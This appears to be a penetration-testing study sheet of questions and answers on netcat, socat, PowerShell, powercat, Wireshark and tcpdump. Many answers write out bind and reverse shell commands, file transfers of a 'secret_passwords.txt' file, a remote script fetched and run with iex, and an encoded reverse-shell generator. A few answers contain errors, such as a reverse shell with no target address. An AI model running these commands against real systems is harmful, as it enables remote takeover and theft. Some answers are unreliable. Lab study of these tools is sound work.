Chapter 4: Practical Tools

Question 1

Type out a netcat command listening on port 4444.

Answer 1

nc -nvlp 4444

Question 2

Type out a netcat command connecting to another address on port 4444

Answer 2

nc -nv 10.11.1.1 4444

Question 3

What does the -e switch on netcat do? Explain it in terms of data streams.

Answer 3

the -e switch redirects input output and error into the port. an application like /bin/bash being executed will have all it’s data sent to the port - meaning whoever connects to the port will recieve that info.

Question 4

Type out a netcat bind shell.

Answer 4

nc -lvnp 4444 -e /bin/bash

Question 5

Type out a netcat reverse shell.

Answer 5

nc -nv 4444 -e /bin/bash

Question 6

How do you connect to a remote server using socat?

Answer 6

socat - TCP4:10.11.1.1:80

Question 7

How do you use socat to create a listener?

Answer 7

socat - TCP4-LISTEN:443 STDOUT

Question 8

How do you send a file using socat?

Answer 8

socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Question 9

Recieving a file from socat, what do we type?

Answer 9

socat TCP4:10.11.0.4:443 file:recieved_secret_password.txt,create

Question 10

In terms of socat reverse shells, how do we set up a listener?

Answer 10

sudo socat TCP4-LISTEN:443 STDOUT

Question 11

In terms of socat reverse shells, how do we initiate the connection?

Answer 11

socat TCP4:10.11.0.22:443 EXEC:/bin/bash

Question 12

How do we send a file using netcat? Type out the client and server commands

Answer 12

nc -nv 10.11.1.3 80 < file.txt

nc -nvlp 80 > file.txt

Question 13

use the openssl command to create a self-signed certificate - so we can use an encrypted socat connection.

Answer 13

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind_shell.crt

Question 14

After we have generated a certificate for ssl, what next steps including commands do we do?

Answer 14

We need to convert the bind_shell.key and bind_shell.crt into bind_shell.pem so that socat can read it.

we do this by using cat bind_shell.key bind_shell.crt > bind_shell.pem

Question 15

After the SSL certificate has been completed, how do we then start a listener?

Answer 15

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin
/bash

Question 16

On Windows Powershell, how do we review the execution policy?

Answer 16

Get-ExecutionPolicy

Question 17

Why is the execution policy on Windows Powershell important?

Answer 17

The execution on Windows Powershell by default is set to Restricted, meaning we cannot run any scripts or configuration files. This is for security reasons, but also restricts our usage of the shell and why we turn it off.

Question 18

On Windows Powershell how do we turn the execution policy to Unrestricted?

Answer 18

Set-ExecutionPolicy Unrestricted

Question 19

How do we download a file using Powershell?

Answer 19

powershell -c “(new-object System.Net.Webclient).DownloadFile(‘http://10.11.1.1/wget.exe’,’C:\Users\Dan\Desktop\wget.exe’)”

Question 20

In the Powershell download command, what does the c switch do?

Answer 20

Executes the supplied command enclose in double quotes.

Question 21

In a Powershell command what does the new-object cmdlet do?

Answer 21

Instantiate either a .Net Framework or a COM object.

Question 22

Within the context of a Powershell download command, expand on what “new-object System.Net.WebClient” means.

Answer 22

new-object instantiates either a .Net framework or a COM object. The new-object cmdlet has created an instance of the WebClient which is defined in the System.Net namespace. The WebClient class is used to access resources from a URI and exposes a public method known as DownloadFile which needs two parameters, a source location and target location.

Question 23

What is Powercat?

Answer 23

Powercat is essentially the Powershell version of netcat.

Question 24

In the context of Powershell, what is Dot-sourcing?

Answer 24

Dot-sourcing allows all functions and variables declared in the script available for the current Powershell session.

Question 25

Why is Dot-sourcing in Powershell important?

Answer 25

It means we can use a certain function directly in powershell instead of constantly declaring it.

Question 26

How do we dot-source a script in Powershell?

Answer 26

. .\powercat.ps1

Question 27

If we wanted to dot-source a remote script, what command would we use?

Answer 27

iex (New-Object System.Net.Webclient).DownloadString(‘https://raw.smackdown.github.com/script.ps1’)

Question 28

In terms of transferring files using powercat, what command would we enter into powershell?

Answer 28

powercat -c 10.11.0.4 -p 443 -i C:\Users\Dan\Desktop\powercat.ps1

the c switch specifies client mode. the p switch specifies the port number and the i switch indicates the local file being transferred to a remote machine.

Question 29

Using powercat, how do you send a reverse shell from Windows?

Answer 29

powercat -c 10.11.1.13 -p 443 -e cmd.exe

Question 30

Using powercat, how do you set up a bind shell?

Answer 30

powercat -l -p 443 -e cmd.exe

Question 31

Using powercat how do we create a stand alone reverse shell?

Answer 31

powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

Question 32

Using powercat how do we create a stand alone reverse shell but with base64 encryption?

Answer 32

powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.
ps1

instead of just a g switch, we add an e switch too.

Question 33

How do you start wireshark on Kali?

Answer 33

sudo wireshark

Question 34

Why is it important to filter data on network sniffers?

Answer 34

Because there is too much noise on the network if you don’t. Without filters you can’t analyse data properly due to the amount of traffic coming and going.

Question 35

At what stage of starting up wireshark is the capture filter present?

Answer 35

At the beginning of the start up process next to the network interface options

Question 36

At what stage of starting up wireshark is the display filter present?

Answer 36

The second screen of the GUI

Question 37

In wireshark what is a useful way to follow the data stream?

Answer 37

right click - follow - tcp stream (or whatever protocol is present)

Question 38

How do you filter an individual port in wireshark using a display filter?

Answer 38

tcp.port == 110

Question 39

Name a text-based network sniffer?

Answer 39

tcpdump

Question 40

On tcpdump how do we specify an interface? (tun0, lan, eth etc)

Answer 40

We use the -i switch

Question 41

On tcpdump how do we specify increase verbosity?

Answer 41

-v switch

Question 42

On tcpdump how do we specify a host filter?

Answer 42

use the host switch “host” and type out the ip address to listen to

Question 43

On tcpdump why is the -X switch important?

Answer 43

it shows us the content of the packets